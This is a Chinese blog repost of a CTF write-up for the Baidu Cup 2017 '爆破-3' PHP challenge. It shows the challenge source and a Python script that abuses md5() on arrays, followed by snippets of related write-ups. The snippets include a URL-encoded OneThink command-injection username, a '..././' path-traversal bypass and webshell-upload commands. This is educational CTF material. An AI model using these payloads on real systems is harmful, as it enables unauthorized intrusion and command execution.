“百度杯”CTF比赛 2017 二月场 爆破-3

最新推荐文章于 2022-04-04 16:16:09 发布
最新推荐文章于 2022-04-04 16:16:09 发布
阅读量190 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: php
原文链接:http://www.cnblogs.com/BOHB-yunying/p/10604292.html

进入题目,题目源码:

<?php 
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
  $_SESSION['nums'] = 0;
  $_SESSION['time'] = time();
  $_SESSION['whoami'] = 'ea';
}

if($_SESSION['time']+120<time()){
  session_destroy();
}

$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;
  $_SESSION['whoami'] = $str_rands;
  echo $str_rands;
}

if($_SESSION['nums']>=10){
  echo $flag;
}

show_source(__FILE__);
?>

我审计10分钟,看了30分钟竟然没想出来怎么解,是真的蠢。看了下WP,写个脚本就爆破出来了。脑子太笨了,反应太慢。做的题目还是少。

题目意思就是一开始nums为0,接收的value变量,要满足value数组的前两个数和whoaimi变量相同并且md5加密后的value变量为0(这个可以用MD5无法处理数组的漏洞)

也就是第一次,传入变量?value[]=ea,因此value[0]=ea    与whoami想等,所以nums++   (如果value[]=ea&value=es的话,value[0].value[1]=eaes)

然后随意A-Z+A-Z,写个脚本,把显示出来的两个随机衣服在value[]=xx传值进去,直到输出flag   (千万注意带 session,保持一个回话)

上脚本:

import requests
url='http://5aff2966a9bc42598f68a1f03a7c5ec962143d7178324b4c.changame.ichunqiu.com/'
session=requests.Session()
html=session.get(url+'?value[]=ea').text
for i in range(10):
    html=session.get(url+'?value[]='+ html[0:2]).text
print(html)

 

转载于:https://www.cnblogs.com/BOHB-yunying/p/10604292.html

百度CTF比赛 2017 二月--web 爆破-3
hanjinrui15的博客
12-28 373
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
百度CTF比赛 2017 二月,题目名称:爆破-3
qq_43814486的博客
11-18 600
刚刚打开就看到404: 看了下网址,没毛病,于是转到index.php看看: 已经很清楚了,就是要在120秒内达成这个条件10次就能输出flag了 $ _SESSION['whoami']==( $ value[0]. $ value[1]) && substr(md5($value),5,4)==0 真是如题目所说的,,,爆破,,,,,然后我就想如何?value=(解密的e...
百度CTF比赛 2017 二月 爆破-3
SPS98
11-03 309
一道代码审计题, 题目代码如下: <?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = 'ea...
百度CTF比赛 2017 二月--web 爆破-3 writeup
会下雪的晴天
06-14 605
题目简介 解题思路 进入链接后得到 <?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = '...
百度CTF比赛 2017 二月_onthink
a173262565的博客
04-07 335
题目在i春秋ctf训练营中能找到,这题直接拿大佬的wp来充数 百度找到onethinnk的一个漏洞。 参考:http://www.hackdig.com/06/hack-36510.htm 就是注册个账号为: %250a%24a%3d%24_GET%5ba%5d%3b%2f%2f%250aecho+%60%24a%60%3b%2f%2f的账号, 但因为账号...
百度CTF比赛 2017 二月爆破-1(10分)
qq_34106499的博客
01-14 675
1. 文件包含的利用:include()函数; 2. $_REQUEST函数的使用; 3. 正则匹配的使用:pre_match()函数; 4. eval()函数的利用; 5. 全局变量$GLOBALS的利用;
百度CTF比赛2017年2月WP--web
Oavinci的博客
06-02 1072
一、爆破-1 在php语言中,所有的已经定义的变量都会保存在GLOBALS全局数组中,比方说你定义了一个$name="李华",那么$GLOBALS['name']就等于“李华”。就是说,你可以通过这个全局数组来访问任何一个变量,所有已经定义过的变量都可以在里面通过变量名索引得到。 preg_match函数返回值为匹配到的次数。 审计代码可以知道,我们可以用GET传值方式?hello=...
百度CTF比赛 2017 二月 爆破1-3
drip_big的博客
04-10 248
百度CTF比赛 2017 二月 爆破1-3 1 题目内容:flag就在某六位变量中。 题目给出源码 <?php include "flag.php"; $a = @$_REQUEST['hello']; //hello为传参点 if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); ...
---百度CTF比赛 2017 二月---------------include
qq_43182466的博客
04-26 340
ctrl+f查找allow_url_include ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190426220537866.png 可以构造?path=php://input 发现有个奇怪的文件名,访问它<?php echo 'cat dle345aae.php'?>出不来,但是看writeup上上条语句可以得到flag ...
百度CTF比赛 2017 二月——Web-爆破-3
大方子
08-27 758
================================== 个人收获: 1.php中MD5()计算数组会返回null如果用==0则为真   ==================================     题目: 主要是代码审计,大家可以自己百度下都能看得懂的,这里我就直说关键的部分   关键部分代码在这 if($_SESSION['whoami'...
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目。
百度CTF比赛 2017 二月(Misc Web)
andiao1218的博客
04-21 622
爆破-1: 打开链接,是502 我直接在后面加个变量传参数:?a=1 出了一段代码 var_dump()函数中,用了$$a,可能用了超全局变量GLOBALS 给hello参数传个GLOBALS 得到flag 爆破-2: 打开链接 var_dump()会返回数据变量的类型和值 eval()会把字符串当作php代码 ...
百度CTF比赛 2017 二月 MiscWeb 爆破-1
qq_41475791的博客
11-26 306
打开题目的连接出现这串代码 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> 从代码***include “flag.php”;**...
百度CTF比赛 2017 二月 --- 爆破2(10分)
qq_34106499的博客
01-14 470
1. file_get_contents()函数的使用; 2. file()函数的使用; 3. show_source()函数的使用; 4. php中执行linux系统命令的多种方法; 5. eval()函数的使用。
百度CTF比赛 2017 二月--web 爆破-2
hanjinrui15的博客
12-27 222
百度CTF比赛 2017 二月--web 爆破-2基础知识PHP $_REQUESTPHP file()函数PHP show_source()函数PHP var_dump()函数PHP中@符号解题题目分析题目总结 基础知识 web题目主要考察的还是PHP的代码理解与运用,我们根据这道题目先学习一下需要了解的基础知识。 PHP $_REQUEST 以下是我从百度中找到的比较易于理解的解释: PHP $_REQUEST是用于收集HTML表单提交的数据,PHP $_REQUEST属于PHP的超级全局变量。
2017 百度二月第一周WP
weixin_30312659的博客
12-13 173
1.祸起北荒 题目: 亿万年前 天子之子华夜,被父神之神末渊上神告知六荒十海之北荒西二旗即将发生一百度”的诸神之战 他作为天族的太子必须参与到此次诸神之战定六荒十海 华夜临危受命,马上带着火凤凰飞行到北荒“西二旗” 却没想到这六荒之首北荒西二旗果然名不虚传,这是一个位于六层虚数空间上的时空大陆 他需要闯过每一层虚数空间,方能到达虚数空间 第一层虚数空间是需要与一个上古神器“i春秋”进行智能比...
百度CTF比赛 2017 二月 wp
qq_61768489的博客
04-04 1610
目录 爆破-1 爆破-2 爆破-3 include Zone OneThink misc 2 上古神器 爆破-1 flag在一个长度为6的变量里面 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> $$a ,.
百度CTF比赛 2017 二月 Zone
u011250160的博客
04-06 300
使用dirseatch扫描敏感目录 绕过登录 返回的页面中有个Manage 访问Manage 发现返回中有admin.php?module=index&name=php 访问 /manages/admin.php?module=index&name=php /manages/admin.php?module=in../dex&name=php 它俩返回的页面是一样的 说明过滤了../ 使用..././绕过 发现 访问nginx的配置文件 发现:include sites-e
ctf比赛利用ctftools-all-in-one进行web题目的解题
最新发布
06-30
CTF比赛中,使用 `ctftools-all-in-one` 工具可以帮助选手快速定位问题、自动化测试以及提高解题效率。该工具集成了多种Web类题目常用的插件和功能,能够应对常见的漏洞检测与利用景,如SQL注入、XSS、文件包含、目录扫描等。 ### 使用 `ctftools-all-in-one` 解决 Web 类题目的方法 #### 1. **环境准备** 确保你已经下载并安装了 `ctftools-all-in-one` 工具包,同时具备 Python 环境支持。通常该工具依赖于 Python 3 和一些第三方库,例如 `requests`、`BeautifulSoup`、`lxml` 等。 ```bash pip install requests beautifulsoup4 lxml ``` #### 2. **基础扫描功能** `ctftools-all-in-one` 提供了基本的网站扫描功能,可以用于发现隐藏路径、备份文件、常见配置文件等。 ```bash python ctftools.py dirscan -u http://example.com ``` 此命令将对目标网站进行目录扫描,识别 `.git`、`.DS_Store`、`robots.txt`、`backup.zip` 等敏感资源,适用于像引用[4]中提到的源码泄漏情况 [^4]。 #### 3. **SQL 注入检测** 该工具内置 SQL 注入检测模块,可以自动探测是否存在注入点,并尝试提取数据库信息。 ```bash python ctftools.py sqli -u http://example.com/login.php --data "username=admin&password=123" ``` 此命令会对登录接口进行 POST 请求注入测试,适用于 Web 类题目中常见的登录框绕过或数据库信息获取景 [^4]。 #### 4. **XSS 漏洞检测** 对于存在用户输入输出的页面,如留言本、评论框等,`ctftools-all-in-one` 可以自动探测 XSS 漏洞。 ```bash python ctftools.py xss -u http://example.com/submit.php --data "comment=test" ``` #### 5. **文件上传漏洞检测** 该工具支持检测是否存在可利用的文件上传漏洞,并尝试上传 WebShell。 ```bash python ctftools.py upload -u http://example.com/upload.php --file shell.php ``` #### 6. **Cookie 注入与会话劫持** 通过设置自定义 Cookie 或模拟登录,可以尝试进行会话固定、越权访问等操作。 ```bash python ctftools.py cookie -u http://example.com/dashboard.php --cookie "PHPSESSID=abc123xyz" ``` #### 7. **结合实战案例分析** 在实际 CTF 比赛中,Web 题目往往需要综合运用多个技巧。例如,在引用[4]中提到的 `.DS_Store` 泄漏事件,可以通过以下命令检测: ```bash python ctftools.py dsstore -u http://example.com/.DS_Store ``` 该命令将解析 `.DS_Store` 文件内容,提取出可能存在的源码路径,进而下载源码进行审计,寻找 flag 所在位置 。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值